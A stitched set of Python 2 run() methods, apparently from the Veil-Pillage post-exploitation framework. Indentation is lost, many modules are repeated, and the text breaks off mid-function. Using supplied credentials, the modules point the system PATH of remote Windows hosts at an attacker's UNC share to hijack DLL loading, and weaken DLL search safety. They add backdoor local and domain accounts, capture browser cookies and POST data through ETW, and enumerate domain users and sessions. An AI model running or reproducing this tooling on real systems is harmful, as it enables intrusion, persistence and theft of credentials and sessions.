def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
for target in self.targets:
existingPath, newPath = "", ""
# reg.exe to get the current path
pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path"
pathResult = command_methods.executeResult(target, username,
password, pathCMD,
triggerMethod)
# parse the PATH output
parts = pathResult.split("\r\n")
# check if we get a valid result
if parts[1].startswith("HKEY"):
regParts = parts[2].split()
existingPath = " ".join(regParts[2:])
if existingPath != "":
newPath = "\\\\" + lhost + "\\system\\;" + existingPath
else:
print helpers.color(" [!] Error: No path found\n",
warning=True)
regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + newPath + "\""
regResult = command_methods.executeResult(target, username,
password, regCMD,
triggerMethod)
if regResult == "":
self.output += "[!] No result file, reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully." in regResult:
self.output += "[*] reg PATH successfully set with \\\\" + lhost + "\\system using creds '" + username + ":" + password + "' on : " + target + "\n"
# add in our cleanup command to restore the original PATH
cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + existingPath + "\""
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
# allow \\UNC loading in %PATH% :)
regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
regResult2 = command_methods.executeResult(
target, username, password, regCMD2, triggerMethod)
self.output += "[*] reg command to allow UNC loading successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
# cleanup -> make everything more secure by disable UNC/SMB loading
cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD2 + "|" + triggerMethod + "\n"
else:
self.output += "[!] reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
# print a message if command succeeded on at least one box
if self.output != "":
self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
group = self.required_options["group"][0]
triggerMethod = "winexe"
for target in self.targets:
targetUsernames = []
# reg.exe command to query the domain group
# we want to do this on each box so we can operate across domains!
command = "net group \"%s\" /domain" % (group)
result = command_methods.executeResult(target, username, password,
command, triggerMethod)
# TODO: sanity check that we get a correct file back?
# find the ---------- marker, get the bottom half, split by newline
# and extract just the name fields
nameParts = result[result.find("-----"):].split("\r\n")[1:-3]
for part in nameParts:
targetUsernames.extend(part.lower().split())
# check the task list on the host
taskListResult = command_methods.executeResult(
target, username, password, "tasklist /V /FO CSV",
triggerMethod)
# check the sessions list on the host
sessionsResult = command_methods.executeResult(
target, username, password, "qwinsta", triggerMethod)
print ""
# for each username in our target list, see if they show up in the queried results
for u in targetUsernames:
if u.lower() in taskListResult.lower():
self.output += "[*] User '%s\\%s' has a process on %s\n" % (
group, u, target)
print helpers.color(
"\n [*] User '%s\\%s' has a process on %s!" %
(group, u, target))
time.sleep(1)
if u.lower() in sessionsResult.lower():
self.output += "[*] User '%s\\%s' has a session on %s\n" % (
group, u, target)
print helpers.color(
" [*] User '%s\\%s' has a session on %s!" %
(group, u, target))
time.sleep(1)
# if we have no results, add message to the output
if self.output == "":
self.output = "[!] No users found\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
for target in self.targets:
existingPath, newPath = "", ""
# reg.exe to get the current path
pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path"
pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod)
# parse the PATH output
parts = pathResult.split("\r\n")
# check if we get a valid result
if parts[1].startswith("HKEY"):
regParts = parts[2].split()
existingPath = " ".join(regParts[2:])
if existingPath != "":
newPath = "\\\\"+lhost+"\\system\\;"+existingPath
else:
print helpers.color(" [!] Error: No path found\n", warning=True)
regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+newPath+"\""
regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod)
if regResult == "":
self.output += "[!] No result file, reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully." in regResult:
self.output += "[*] reg PATH successfully set with \\\\"+lhost+"\\system using creds '"+username+":"+password+"' on : " + target + "\n"
# add in our cleanup command to restore the original PATH
cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+existingPath+"\""
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
# allow \\UNC loading in %PATH% :)
regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
regResult2 = command_methods.executeResult(target, username, password, regCMD2, triggerMethod)
self.output += "[*] reg command to allow UNC loading successfully set using creds '"+username+":"+password+"' on : " + target + "\n"
# cleanup -> make everything more secure by disable UNC/SMB loading
cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD2+"|"+triggerMethod+"\n"
else:
self.output += "[!] reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n"
# print a message if command succeeded on at least one box
if self.output != "":
self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
userToAdd = self.required_options["user"][0]
passToAdd = self.required_options["pass"][0]
groupToAdd = self.required_options["group"][0]
# command to add the user:password to the machine
userAddCommand = "net user " + userToAdd + " " + passToAdd + " /add"
# command to add the user to the specified localgroup
groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add"
# execute the user add command and get the result
userAddResult = command_methods.executeResult(
target, username, password, userAddCommand, triggerMethod)
# check all of our results as appropriate
if userAddResult == "":
self.output += "[!] No result file, user add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The command completed successfully" in userAddResult:
self.output += "[*] User '" + userToAdd + ":" + passToAdd + "' successfully added using creds '" + username + ":" + password + "' on " + target + "\n"
# cleanup -> delete the user from the system
cleanupCMD = "net user " + userToAdd + " /delete"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
# if the user add command succeeded, continue to the group add
groupAddResult = command_methods.executeResult(
target, username, password, groupAddCommand, triggerMethod)
if groupAddResult == "":
self.output += "[!] No result file, user add of user '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The command completed successfully" in groupAddResult:
self.output += "[*] User '" + userToAdd + "' successfully added to localgroup '" + groupToAdd + "' using creds '" + username + ":" + password + "' on " + target + "\n"
else:
self.output += "[!] User add '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
self.output += "[!] User add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
group = self.required_options["group"][0]
triggerMethod = "winexe"
for target in self.targets:
targetUsernames = []
# reg.exe command to query the domain group
# we want to do this on each box so we can operate across domains!
command = "net group \"%s\" /domain" %( group )
result = command_methods.executeResult(target, username, password, command, triggerMethod)
# TODO: sanity check that we get a correct file back?
# find the ---------- marker, get the bottom half, split by newline
# and extract just the name fields
nameParts = result[result.find("-----"):].split("\r\n")[1:-3]
for part in nameParts:
targetUsernames.extend(part.lower().split())
# check the task list on the host
taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod)
# check the sessions list on the host
sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod)
print ""
# for each username in our target list, see if they show up in the queried results
for u in targetUsernames:
if u.lower() in taskListResult.lower():
self.output += "[*] User '%s\\%s' has a process on %s\n" %(group, u, target)
print helpers.color("\n [*] User '%s\\%s' has a process on %s!" %(group, u, target))
time.sleep(1)
if u.lower() in sessionsResult.lower():
self.output += "[*] User '%s\\%s' has a session on %s\n" %(group, u, target)
print helpers.color(" [*] User '%s\\%s' has a session on %s!" %(group, u, target))
time.sleep(1)
# if we have no results, add message to the output
if self.output == "":
self.output = "[!] No users found\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
trigger_method = "wmis"
for target in self.targets:
# reg.exe command to query the domain group
command = "whoami /user"
result = command_methods.executeResult(target, username, password,
command, trigger_method)
if result == "":
self.output += "[!] No result file, query for domain sid '" + group + "'' failed on " + target + "\n"
else:
sid = ""
for line in result.split("\n"):
if "S-" in line:
user, sid_full = line.split()
# extract the domain sid from the results
sid = "-".join(sid_full.split("-")[:-1])
print helpers.color("\n\n [*] Domain sid: " + sid)
time.sleep(2)
self.output += "[*] Domain sid extracted using creds '" + username + ":" + password + "' on " + target + ": " + sid + "\n"
if sid == "":
self.output += "[!] Couldn't extract domain sid from results using creds '" + username + ":" + password + "' on " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg.exe command to detect if powershell is installed
command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
result = command_methods.executeResult(target, username, password,
command, triggerMethod)
if result.startswith("error:"):
self.output += "[!] Error '" + result + "' in detecting powershell using creds '" + username + ":" + password + "' on : " + target + "\n"
elif result == "":
self.output += "[!] No result file, detect PowerShell failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "0x1" in result:
self.output += "[*] PowerShell detected using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "0x0" in result:
self.output += "[*] PowerShell not detected using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
print "result:", result
self.output += "[!] Error in detecting PowerShell using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# command to invoke finddllhijack and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
# execute finddllhijack and get the results
out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
# cleanup
command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)
if out != "":
self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
trigger_method = "wmis"
for target in self.targets:
# reg.exe command to query the domain group
command = "whoami /user"
result = command_methods.executeResult(target, username, password, command, trigger_method)
if result == "":
self.output += "[!] No result file, query for domain sid '"+group+"'' failed on " + target + "\n"
else:
sid = ""
for line in result.split("\n"):
if "S-" in line:
user,sid_full = line.split()
# extract the domain sid from the results
sid = "-".join(sid_full.split("-")[:-1])
print helpers.color("\n\n [*] Domain sid: "+sid)
time.sleep(2)
self.output += "[*] Domain sid extracted using creds '"+username+":"+password+"' on " + target + ": "+sid+"\n"
if sid == "":
self.output += "[!] Couldn't extract domain sid from results using creds '"+username+":"+password+"' on " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
userToAdd = self.required_options["user"][0]
passToAdd = self.required_options["pass"][0]
groupToAdd = self.required_options["group"][0]
# command to add the user:password to the machine
userAddCommand = "net user "+userToAdd+" "+passToAdd+" /add /domain"
# command to add the user to the specified domain group
groupAddCommand = "net group "+groupToAdd+" "+userToAdd+" /add /domain"
# execute the user add command and get the result
userAddResult = command_methods.executeResult(target, username, password, userAddCommand, triggerMethod)
# check all of our results as appropriate
if userAddResult == "":
self.output += "[!] No result file, domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The command completed successfully" in userAddResult:
self.output += "[*] Domain user '"+userToAdd+":"+passToAdd+"' successfully added using creds '"+username+":"+password+"' on " + target + "\n"
# cleanup -> delete the user from the domain
cleanupCMD = "net user "+userToAdd+" /delete /domain"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
# if the user add command succeeded, continue to the group add
groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)
if groupAddResult == "":
self.output += "[!] No result file, domain user add of user '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The command completed successfully" in groupAddResult:
self.output += "[*] Domain user '"+userToAdd+"' successfully added to group '"+groupToAdd+"' using creds '"+username+":"+password+"' on " + target + "\n"
else:
self.output += "[!] Domain user add '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
else:
self.output += "[!] Domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
targetUsernames = []
# if we're passed a file, read in the usernames
if os.path.exists(self.required_options["user"][0]):
f = open(self.required_options["user"][0])
lines = f.readlines()
f.close()
for line in lines:
targetUsernames.append(line.strip())
# if we have just a single name, use just that
else:
targetUsernames.append(self.required_options["user"][0])
for target in self.targets:
# check the task list on the host
taskListResult = command_methods.executeResult(
target, username, password, "tasklist /V /FO CSV",
triggerMethod)
# check the sessions list on the host
sessionsResult = command_methods.executeResult(
target, username, password, "qwinsta", triggerMethod)
# for each username in our target list, see if they show up in the queried results
for u in targetUsernames:
if u.lower() in taskListResult.lower():
self.output += "[*] User '%s' has process on %s\n" % (
u, target)
if u.lower() in sessionsResult.lower():
self.output += "[*] User '%s' has session on %s\n" % (
u, target)
# if we have no results, add message to the output
if self.output == "":
self.output = "[!] No users found\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
targetUsernames = []
# if we're passed a file, read in the usernames
if os.path.exists(self.required_options["user"][0]):
f = open(self.required_options["user"][0])
lines = f.readlines()
f.close()
for line in lines:
targetUsernames.append(line.strip())
# if we have just a single name, use just that
else:
targetUsernames.append(self.required_options["user"][0])
for target in self.targets:
# check the task list on the host
taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod)
# check the sessions list on the host
sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod)
# for each username in our target list, see if they show up in the queried results
for u in targetUsernames:
if u.lower() in taskListResult.lower():
self.output += "[*] User '%s' has process on %s\n" %(u, target)
if u.lower() in sessionsResult.lower():
self.output += "[*] User '%s' has session on %s\n" %(u, target)
# if we have no results, add message to the output
if self.output == "":
self.output = "[!] No users found\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
command = self.required_options["command"][0]
for target in self.targets:
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result != "":
self.output += "[*] Results for '"+command+"' using creds '"+username+":"+password+"' on "+target+" : \n"
self.output += result
self.output += "\n\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD,
triggerMethod)
# search for cookies or POST paramters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target,
username,
password,
parseCmd,
triggerMethod,
pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
command_methods.executeCommand(target, username, password, delCmd,
triggerMethod)
if parseResult == "":
self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile,
parseResult)
self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = "winexe"
for target in self.targets:
# net command to query the domain group
command = "net users /domain"
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result == "":
self.output += "[!] No result file, query for domain user failed using creds '"+username+":"+password+"' on " + target + "\n"
else:
self.output += "[!] Query for domain users sucessful on " + target + ":\n"
self.output += result + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = "winexe"
for target in self.targets:
# net command to query the domain group
command = "net users /domain"
result = command_methods.executeResult(target, username, password,
command, triggerMethod)
if result == "":
self.output += "[!] No result file, query for domain user failed using creds '" + username + ":" + password + "' on " + target + "\n"
else:
self.output += "[!] Query for domain users sucessful on " + target + ":\n"
self.output += result + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
for target in self.targets:
# execute the command on the host and get the output
out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod)
if "SUCCESS" in out:
self.output += "[*] Powershell processes terminated using creds '"+username+":"+password+"' on "+target+"\n"
else:
self.output += "[*] Powershell processes failed to terminate using creds '"+username+":"+password+"' on "+target+"\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# disable RDP command
rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"
# execute the RDP enable command and get the result
rdpResult = command_methods.executeResult(target, username, password, rdpCMD,triggerMethod)
if rdpResult == "":
self.output += "[!] No result file, RDP disable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in rdpResult:
self.output += "[*] RDP successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg.exe command to enable UAC
command = "reg ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f"
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result == "":
self.output += "[!] No result file, UAC enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in result:
self.output += "[*] UAC successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
else:
self.output += "[!] Error in enabling UAC using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
# but we don't actually care usually if it's installed, just if it's functionality
# so let's just invoke it yo'
command = "powershell.exe -c \"$a=42;$a\""
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result.strip() == "42":
self.output += "[*] Powershell detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
else:
self.output += "[!] Powershell not detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# the registry command to disable the sethc stickkeys backdoor
disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
# execute the sethc command and get the result
disableResult = command_methods.executeResult(target, username, password, disableSethcCommand, triggerMethod)
if disableResult == "":
self.output += "[!] No result file, SETHC backdoor disable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in disableResult:
self.output += "[*] SETHC backdoor successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
trigger_method = self.required_options["trigger_method"][0]
for target in self.targets:
command = "echo %USERPROFILE%"
user_profile = command_methods.executeResult(target, username, password, command, trigger_method)
if user_profile == '':
self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n"
else:
user_profile = user_profile.strip(" \r\n")
recent_path1 = user_profile + "\\Recent"
recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent"
office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent"
office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent"
self.output += " [*] Enumerating recent files on %s \n" % target
for path in [recent_path1, recent_path2, office_path1, office_path2]:
files = smb.ls(target, username, password, path, path_error=False)
if len(files) > 0:
self.output += " [*] Found %s files \n" % len(files)
for file in files:
if file[-3:] == "lnk":
out = smb.getFile(target, username, password, path + "\\" + file, delete=False)
if out == '':
self.output += " [!] Failed retrieving : %s \n" % file
else:
save_path = helpers.saveModuleFile(self, target, file, out)
self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path)
try:
# parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252')
parsed_lnk = pylnker.parse_lnk(save_path)
details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk)
self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path)
except:
self.output += " [!] Error while parsing : %s \n" % save_path
def run(self):
# assume single set of credentials
username, password = self.creds[0]
group = self.required_options["group"][0]
triggerMethod = "winexe"
for target in self.targets:
# net command to query the domain group
command = "net group \"%s\" /domain" %( group )
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result == "":
self.output += "[!] No result file, query for domain group '"+group+"'' failed using creds '"+username+":"+password+"' on " + target + "\n"
else:
self.output += "[*] Query for domain group '"+group+"'' sucessful using creds '"+username+":"+password+"' on " + target + ":\n"
self.output += result + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
# but we don't actually care usually if it's installed, just if it's functionality
# so let's just invoke it yo'
command = "powershell.exe -c \"$a=42;$a\""
result = command_methods.executeResult(target, username, password,
command, triggerMethod)
if result.strip() == "42":
self.output += "[*] Powershell detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
self.output += "[!] Powershell not detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# the registry command to disable the sethc stickkeys backdoor
disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
# execute the sethc command and get the result
disableResult = command_methods.executeResult(
target, username, password, disableSethcCommand, triggerMethod)
if disableResult == "":
self.output += "[!] No result file, SETHC backdoor disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in disableResult:
self.output += "[*] SETHC backdoor successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# command to start Event Tracing for Windows on the target for WinInit (IE)
cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"
etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod)
if etwResult == "":
self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on : " + target + ", no result file\n"
elif "The command completed successfully." in etwResult:
self.output += "[*] ETW started using creds '"+username+":"+password+"' on "+target+"\n"
else:
self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials (take the first one)
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# disable RDP command
rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"
# execute the RDP enable command and get the result
rdpResult = command_methods.executeResult(target, username,
password, rdpCMD,
triggerMethod)
if rdpResult == "":
self.output += "[!] No result file, RDP disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in rdpResult:
self.output += "[*] RDP successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
for target in self.targets:
print " [*] Doing something on %s" %(target)
command = "something to do on the host"
# ...
result = command_methods.executeResult(target, username, password, command, self.required_options["trigger_method"][0])
# check our output and write output/cleanup as appropriate
if "something" in result:
self.output += "action successful on " + target + "\n"
# this needs to be tab-separated, check a module for examples
self.cleanup += "cleanup command " + target + "\n"
# finally return our putput and cleanup text
return (self.output, self.cleanup)
def run(self):
# assume single set of credentials
username, password = self.creds[0]
group = self.required_options["group"][0]
triggerMethod = "winexe"
for target in self.targets:
# net command to query the domain group
command = "net group \"%s\" /domain" % (group)
result = command_methods.executeResult(target, username, password,
command, triggerMethod)
if result == "":
self.output += "[!] No result file, query for domain group '" + group + "'' failed using creds '" + username + ":" + password + "' on " + target + "\n"
else:
self.output += "[*] Query for domain group '" + group + "'' sucessful using creds '" + username + ":" + password + "' on " + target + ":\n"
self.output += result + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg.exe command to disable UAC
command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
result = command_methods.executeResult(target, username, password, command, triggerMethod)
if result == "":
self.output += "[!] No result file, check UAC failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "0x1" in result:
self.output += "[*] UAC enabled using creds '"+username+":"+password+"' on : " + target + "\n"
elif "0x0" in result:
self.output += "[*] UAC disabled using creds '"+username+":"+password+"' on : " + target + "\n"
else:
self.output += "[!] Error in checking UAC using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg.exe command to disable UAC
command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
result = command_methods.executeResult(target, username, password,
command, triggerMethod)
if result == "":
self.output += "[!] No result file, check UAC failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "0x1" in result:
self.output += "[*] UAC enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "0x0" in result:
self.output += "[*] UAC disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
else:
self.output += "[!] Error in checking UAC using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# command to start Event Tracing for Windows on the target for WinInit (IE)
cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"
etwResult = command_methods.executeResult(target, username,
password, cmd,
triggerMethod)
if etwResult == "":
self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on : " + target + ", no result file\n"
elif "The command completed successfully." in etwResult:
self.output += "[*] ETW started using creds '" + username + ":" + password + "' on " + target + "\n"
else:
self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
# search for cookies or POST paramters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
command_methods.executeCommand(target, username, password, delCmd, triggerMethod)
if parseResult == "":
